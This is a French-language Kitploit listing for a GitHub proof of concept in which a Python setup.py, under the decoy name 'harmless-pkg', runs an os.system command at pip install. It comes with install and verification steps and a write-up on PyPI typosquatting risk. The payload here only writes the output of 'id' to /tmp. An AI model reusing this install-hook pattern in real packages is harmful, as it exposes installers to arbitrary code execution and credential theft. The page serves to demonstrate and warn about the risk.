Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution- — Démontre comment un paquet Python malveillant exécute des commandes arbitraires lors de l'installation via pip install en utilisant setup.py, mettant en évidence les risques liés à la chaîne d'approvisionnement PyPI et au typosquatting. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-
ExploitationSécurité de la Chaîne LogistiqueApprentissage et ÉducationDéveloppement de Charges UtilesAttaque Adversariale
GitHubgeorge0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-

CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-

Démontre comment un paquet Python malveillant exécute des commandes arbitraires lors de l'installation via pip install en utilisant setup.py, mettant en évidence les risques liés à la chaîne d'approvisionnement PyPI et au typosquatting.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 17 joursPas encore vérifié

CVE-2026-21016 – Hook d'installation de paquet PyPI malveillant (exécution de setup.py)

Code du programme (Python)

root@kitploit:~
# setup.py - Malicious package that executes during install
from setuptools import setup
import os

# This runs on pip install
os.system('id > /tmp/pwned_by_package')

setup(
    name='harmless-pkg',
    version='1.0',
    packages=[],
)

CVE-2026-21016 – Hook d'installation de paquet PyPI malveillant (setup.py)

Severity: Critical

Aperçu

Un paquet PyPI peut inclure du code arbitraire dans son setup.py, qui est exécuté lors du pip install. Un attaquant peut publier un paquet dont le nom ressemble à celui d'un paquet populaire (typosquatting) et, lors de l'installation, la charge utile s'exécute avec les privilèges de l'utilisateur, conduisant à une exécution de code à distance.

Détails de la vulnérabilité

  • Type : Attaque de la chaîne d'approvisionnement / Exécution de code
  • Impact : Compromission du système, vol d'identifiants.
  • Cause racine : Pip exécute setup.py sans bac à sable, ce qui donne aux paquets un accès complet.

Démonstration de l'exploitation

  1. Créez le répertoire du paquet malveillant avec le setup.py fourni.
  2. Installez-le localement :
    root@kitploit:~
    pip install ./harmless-pkg
    
    
  3. Vérifiez la sortie :
    root@kitploit:~
    cat /tmp/pwned_by_package
    

La commande id a été exécutée.

Télécharger l’outil